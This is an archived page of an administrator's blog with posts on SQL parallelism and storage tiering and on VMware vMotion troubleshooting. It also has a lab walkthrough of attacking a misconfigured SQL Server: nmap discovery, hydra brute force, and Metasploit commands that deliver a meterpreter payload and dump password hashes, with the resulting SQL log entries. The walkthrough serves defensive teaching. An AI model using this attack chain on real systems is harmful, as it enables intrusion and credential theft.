RSS

Monthly Archives: October 2013

SQL Parallelism and Storage Tiering

Sometimes features, independently acceptable on their own, can combine to produce peculiar results.

SQL

SQL parallelism is simply the query optimizer breaking up tasks to different schedulers. A single query can go parallel in several different parts of the query plan. There is a significant cost associated with separating the threads and then re-assembling them so not all queries will go parallel. To find out if queries are going parallel you can take a look at the plan cache.

Since GHz hasn’t increased in a long time but core count in going through the roof, it makes sense to have a controller thread delegate to the minions. CXPACKET waits will increase when queries have to go parallel. Missing indexes and bad queries can cause queries to go parallel.

The CXPACKET wait is incredibly complex. There are ways to make it go away without really fixing a problem. For example, setting max degree of parallelism (MAXDOP) to 1 will certainly make CXPACKET go away. Increasing the cost threshold for parallelism higher than the cost of your queries will also make CXPACKET go away. The goal isn’t to make CXPACKET go away. The goal is to make queries faster, not to fix the waits.

Storage

Recently, in my short career as a SAN admin I have been exposed to automatic storage tiering. With storage tiering we are taking pools of storage, with different performance characteristics, and attempting to spread the workload across the different pools drives. Ideally, the pool’s IOPS capability matches the demand for IOPS. Ideally, data that doesn’t get accessed that often will get put on slower cheaper storage. Ideally this reduces the need to identify archive workloads up front because the back-end storage solves most of that problem. Ideally management will buy enough storage so that everything isn’t running on disk pools with archive characteristics. My point is storage tiering doesn’t always work as well as advertised. Storage tiering is a cost saving maneuver which can cause a lot of inconsistent performance. Inconsistent performance leads to a lot of headaches.

If we combine these two features, some threads on that parallel query could be hitting cheap storage and other minion threads are hitting SSDs. The result is some threads are fast and other threads are slow. This will send CXPACKET waits into orbit. When CXPACKET waits are high, they generally mask any other types of system issues. There are many causes of CXPACKET waits and inconsistent storage performance could be one of them.

Parallelism is a feature to alleviate CPU bottlenecks. With storage tiering, the bottlenecks can quickly shift from storage to CPU and back. So the cost increase of going parallel can sometimes be for nothing if a single thread is waiting on storage.

Take Away


I apologize if you came here looking for some kind of recommendation. The fact is, storage tiering can be a nightmare. Performance troubleshooting is an ever changing game that I am fighting to stay ahead in.

Advertisements
 
Leave a comment

Posted by on October 29, 2013 in SQL Admin, Storage

 

Cannot open the disk: VMWare maintenance mode bug?

Bug? Well I don’t want to jump to conclusions but I recently had some less than desirable behavior when putting a host into maintenance mode.

In this 3 node cluster I had recently created some larger storage VMs to replace a single VM. Both the old and new guests were running for the parallel upgrade so it doubled my storage requirements for a short period of time.

While this upgrade was happening I needed to do a driver update on the hosts. I planned to put one in maintenance mode near the end of the day and do the driver update the next day. Maintenance mode started without incident and all VMs started vmotioning off of that host.

The next morning I got some complaints that one of the storage VMs was having some issues. I checked for vmware error messages but didn’t have any. I could ping this VM but I couldn’t log in or do anything else with it. I couldn’t even send a remote reboot command: shutdown -m \\storagevm /f /r /t 00

The error

I was forced to power the VM off. When I tried to power it on vmware gave me this message: Cannot open the disk ‘/vmfs/volumes/xxxx/vm/vm.vmdk’ or one of the snapshot disks it depends on.

I was stumped, I first thought maybe some kind of pathing issue but that did not make any sense because the paths are not define on hosts individually. While the VM was off I was able to migrate it back to the original host and power it on. This worked, so I was back in business but I still needed to update that driver. I then tried to manually vmotion this server to the same host and was presented with this, slightly more descriptive error: The VM failed to resume on the destination during early power on. Cannot open the disk ‘/vmfs/volumes/xxxx/vm/vm.vmdk’ or one of the snapshot disks it depends on. 0 (Cannot allocate memory)

The problem

What happened next was why I use the b word in my title. The manual vmotion does fail but the guest is still happy. It continues run because instead of forcing itself on the destination, it hops back to the source host. The previous evening maintenance mode failed to foresee this problem and rammed my VM onto the host making it unresponsive. No error or message was presented other than maintenance mode was completed successfully. My VMs running properly is far more important than my maintenance mode completing successfully.

The cause

My problem was a vmware storage limitation. A single host can have a limited amount of VMDKs open. I do take responsibility for not knowing how close I was to one of these limitations. But, in my defense, I just got back from VMWorld where they were bragging about 64TB datastores.

This KB was quite helpful and let me know that if I complete my ESXi upgrade I won’t be pushing the limits anymore: http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004424

I also found these other two resources useful.

https://communities.vmware.com/thread/451279?start=0&tstart=0


PowerCLI > Get-HardDisk -Datastore | select -ExpandProperty CapacityGB | measure -sum -ave -max -min

http://pibytes.wordpress.com/2012/11/13/esxi-vmfs-heap-size-blockade-for-monster-virtual-machines-in-bladecenter-infrastructure/

 
Leave a comment

Posted by on October 13, 2013 in Uncategorized

 

Changing memory for the VM was greater than the available network bandwidth

I recently ran into some strange behavior on one of my virtual hosts. I first noticed that the VMWare console was nearly unuseable because it was so slow. It looked like an overly compressed JPEG and the mouse clicks were taking forever on all the VMs on that host. RDP worked fine and the VMs didn’t seem to have any problems. VMs on identical hosts in the same cluster were not having problems. I attempted to vmotion a VM off of that host and it didn’t seem to be progressing. VMs were happy so it wasn’t an urgent issue. The next day I came in and was presented with this error:

“The migration was cancelled because the amount of changing memory for the VM was greater than the available network bandwidth”

I’m stuck in a sticky situation. I have a problem with a host, but I can’t move any VMs off of the host because VMotion isn’t working. Since I am new at VMWare administration I ran the problem by a couple co-workers and then opened a ticket with the vendor.

Lead 1: Busy network

When connecting to a vm console, that traffic is managed by the host kernel. VMotion traffic is also handled by the kernel but can be separated from the other traffic. Both of these things were suffering so it seemed to be pretty obvious where my problem was. I suspected a network problem but wasn’t really sure how to troubleshoot the management network traffic.

This KB was relevant but not helpful. 23 Ratings and the average is one star.
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2009135

This article does some finger pointing of a broader network problem with some general contention. The console was never fast and the VMotions never finished. Support recommended segregating vmotion traffic with kernel traffic in different vlans and port groups. Basically trying to solve a general network busy problem. With only two connections, I could maintain redundancy and segregation by setting one vmnic to active and one to standby and do the opposite for the other port group. That would give me the minimum requirement for VMotion of a dedicated 1Gbit connection.

Lead 2: Bad something or other

The performance was consistently slow. That doesn’t describe a contention problem. So the next suggestion was bad driver/firmware/cable. I tried swapping management cables with another host. The problem stayed with this host and not the cables.

So the last option support kept coming back to was a bad driver or firmware. They suggested updating but this causes me problems because I would have to reboot for this to take effect. I can’t reboot because I can’t get the stinking VMs off this host. Also, why the heck do I have 6 identical hosts and only 1 is having this problem???

Important discovery: Direction matters

I started examining the performance with esxtop. I noticed that while these vmotions were running throughput was staying at a consistent 1 Mbits/sec. That about 1000 times slower than it should be. VMotion can saturate a 1Gb/sec connection. I also found a new and quite useful tool to graph this information. Visual esxtop is like perfmon for esx.

http://labs.vmware.com/flings/visualesxtop

I was able to look at each port individually. I began to understand that even though the two NICs were “active/active” in the port group, a single VMotion would only use a single NIC. Out of the blue, against my better judgement I decided to vmotion a VM onto this box. Previously I was focused on getting VMs off of this server. To my surprise the process worked just fine. That is because it hit the second NIC and not the first one.

Resolution: Turn it off and on again

To resolve my issue I went into the vSwitch properties and edited my management port group making the bad NIC standby. I was then able to move all the VMs off this host and reboot. I added the “bad” NIC back into the port group as active and watched a couple VMotions succeed using 950Mbits/sec throughput on that same “bad” NIC.

So the root cause was a single management NIC(1 of 12) acting a bit goofy and requiring a reboot. Not exactly a perfect resolution but at least I didn’t have to cause any downtime for my users.

 
Leave a comment

Posted by on October 10, 2013 in Virtual

 

Hacking SQL 2014 CTP1 on Windows Server 2012 R2

I have some priors on this topic here and here so if this is your first time I highly suggest you check out those and especially my take on ethics here

I wanted to test out the tools to make sure there were not any new gotchas with the latest and greatest versions of MSSQL and Windows Server. At the heart of this hack is brute forcing a SQL Auth account. I didn’t expect Microsoft to come up with any additional ways to prevent a server from being misconfigured and allowing this attack. What I wasn’t so sure about is if Microsoft had come up with a way to A, prevent the payload from executing or B prevent the payload from dumping the password hashes.

Here is our lesson plan for today.
1. find an instance
2. brute force an account
3. deliver a payload
4. use meterpreter to dump the hashes

Hacking_MSSQL

First up is to install SQL Server. We’ll want to install the database engine, which is the service we are going to exploit, and also the management tools to make it super easy to misconfigure. My previous setup used VMWare player for the SQL box which got a little hairy. Turns out VMWare takes a bit to support new Windows operating systems so Hyper-V was a good choice for this test.

install_SQL

Next up to bat is the boneheaded administrator. Scumbag DBA is going to do a few things to this box to make it super easy for us to deploy our hacker tools. Those misconfigurations include:

1. Local windows administrator service account
2. SQL Auth enabled
3. SQL User with an easy password and the sysadmin server role

misconfigs

Now that we’re ready to rock and roll I decided to use VMWare player for Kali Linux as my attacker machine. I was able to identify that Microsoft SQL Server was at the other end of port 1433 with nmap.

nmap_01

This did however trip a very important SQL Log entry. I’m not sure if this is new to SQL 2014 but someone should contact nmap :]

09/28/2013 09:05:18,Logon,Unknown,The login packet used to open the connection is structurally invalid; the connection has been closed. Please contact the vendor of the client library. [CLIENT: 10.10.10.104]
09/28/2013 09:05:18,Logon,Unknown,Error: 17832 Severity: 20 State: 18.

After using the brute force tool “hydra”, we have a identified a valid username and password of tom/tom. This generates some more log entries. No supprises here:

09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.

Now that we have a valid username and password we can use the metasploit framework to send our payload and attempt to retrieve the hashes. The commands to complete this are:

msfconsole
use exploit/windows/mssql/mssql_payload
set password tom
set username tom
set rhost 10.10.10.105
set lhost 10.10.10.100
exploit
getuid
ps
migrate 2136
hashdump
sysinfo

successful_hashes

Aaaaaaand we’ve got Build 9200 giving us the goods. Getting the hashes allows for lateral movement. All SQL servers on the same domain could very well be at risk now that one SQL Server has been taken advantage of. The key here is to avoid the misconfigurations on ALL servers.

This malicious activity does generate some more notable log activity. Notice that we never enabled xp_cmdshell, the delivery of the payload did that for us.

09/29/2013 09:27:22,spid55,Unknown,Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell' search for 'xp_cmdshell' in SQL Server Books Online.

The goal here is to help everyone be more secure by identifying and testing some basic misconfigurations. We’ve proved that patching alone won’t protect you from all evils.

 
Leave a comment

Posted by on October 1, 2013 in Network Admin, Security, SQL Admin